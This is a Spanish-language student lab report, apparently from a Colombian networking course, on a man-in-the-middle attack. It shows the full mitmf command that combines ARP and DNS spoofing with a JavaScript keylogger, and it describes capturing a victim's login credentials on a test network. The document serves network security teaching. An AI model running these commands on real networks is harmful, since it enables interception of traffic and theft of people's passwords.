Upload
andresmauriciomarcelo
View
93
Download
0
Tags:
Embed Size (px)
DESCRIPTION
interrupción de la red por un tercero para ver el trafico.
Citation preview
ATAQUE DE SEGURIDAD INFORMATICA
“MAN IN THE MIDDLE”
Jorge Leonardo Ordoñez Rodríguez
Ángel Mauricio Amador Mancipe
Jean Michael Gómez Mesa
SERVICIO NACIONAL DE APRENDIZAJE
CENTRO DE ELECTRICIDAD, ELECTRONICA Y TELECOMUNICACIONES
GESTION DE REDES DE DATOS – 683561(6)
REGIONAL DISTRITO CAPITAL
Que es un ataque Man in the Middle o MiTM?
Conocido en español como hombre en el medio, es un ataque informático donde el
hacker o intruso, intercepta la comunicación entre dos partes de la red, bien sea
cliente-servidor o cliente-cliente como también servidor-servidor. Este ataque brinda la
posibilidad de leer, visualizar y hasta modificar los paquetes que se envían dos
elementos en la red.
Qué tipo de ataque MiTM se realizara?
En este laboratorio, se realizó un ataque MiTM utilizando la herramienta “mitmf” en la
distribución Kali Linux en su versión 1.1.0. Básicamente es una interceptación que
emula un servidor proxy entre el host y su respectivo router, este proxy captura los
datos y más exactamente lo que la víctima busca y teclea en su navegador, es un
keylogger online que funciona en la terminal de Linux y captura las búsquedas en la
web sin que la víctima lo detecte.
Como se realizó el laboratorio?
Se usó una maquina Asus N750JK con las siguientes características:
-Procesador Intel Core i7 4710HQ 2.5 Ghz Quadcore TurboBost 3.3 Ghz
-RAM 16Gb DDR3 1600Mhz
-Nvidia GeForce GTX 850M 4GB
- HDD 750Gb x 2
-Windows 7 Ultimate 64 Bits
En el Sistema base Windows, se instaló virtual box donde se emulo el Sistema
atacante Kali Linux. La víctima fue la maquina principal con el sistema Windows 7.
Comandos necesarios:
Para realizar el ataque tuvimos que actualizar el sistema Kali Linux con los siguientes
comandos en modo root:
#apt-get update && apt-get upgrade –fix-missing
Donde –fix-missing corrige errores de actualización.
Y luego procedimos a instalar el paquete “mitmf”
#apt-get install mitmf
La opción –fix-missing es posible si presenta errores.
Una vez instaladas las actualizaciones, realizamos el ataque, no sin antes tener claro
las direcciones IP de cada host, que en este caso serían:
Victima Windows 7: 192.168.0.6
Atacante KaliLinux: 192.168.0.9
Gateway (Router): 192.168.0.1
Ahora, teniendo claras las IP`s, y la distribución de Linux actualizada solo faltaba
empezar a atacar. Para eso usamos el comando “mitmf”
#mitmf –i eth0 –arp –dns –spoof –Gateway (Ip del Gateway) –target (IP victima) –
jskeylogger
Donde:
-i sirve para declarar la interfaz de salida
--arp Define el parámetro arp que hare que el router le entregue el paquete primero al
atacante ya que clona la MAC de la víctima.
--dns Este parámetro activa un servidor temporal o ficticio DNS sobre la maquina
--spoof Sirve para la clonación, en conjunto con –dns harán un copiado idéntico de las
paginas solicitadas por la víctima, pero son paginas infectadas o podríamos decir
vulneradas las cuales arrojaran los datos que el usuario ingrese ingenuamente.
-- Gateway es para definir el Gateway de la red donde se hace el ataque
--target aquí declaramos la IP de la victima
--jskeylogger parámetro que activa la captura de lo que se teclea y pasa a través del
servidor proxy ficticio.
Declaramos el comando
#mitmf –i eth0 –arp –dns –spoof –gateway 192.168.0.1 –target 192.168.0.6 –
jskeylogger
Y esperamos que cargue, para luego mostrar el tráfico y/o consultas de nuestra
victima
Entraremos a google y buscaremos la página ElTiempo.com
Y haremos un inicio de sesión ficticio para ver el resultado en la terminal de Linux:
Podemos evidenciar en la terminal como el atacante envía réplicas exactas pero
infectadas a la víctima de la página en consulta en google.
Ahora ingresaremos para ver como captura el usuario y la contraseña:
Y así como en esta página, se puede hacer en todas. Es un método muy efectivo,
rápido y fácil. Cabe resaltar que hay excepciones, paginas como Facebook, Hotmail,
Gmail, que funcionan haciendo uso obligatorio de HTTPS es imposible aplicar esta
técnica de hacking. La única forma seria que la víctima usara Internet Explorer como
navegador, y accediera por si sola a Facebook con http y no https como observamos a
continuación
Esto fue todo. Muchas Gracias por observar, y recuerda, el conocimiento es libre,
compártelo, menos a los niños rata, a esos no…
Para ver este tutorial siga este enlace:
https://www.youtube.com/watch?v=ggLpWKNIc4I&feature=youtu.be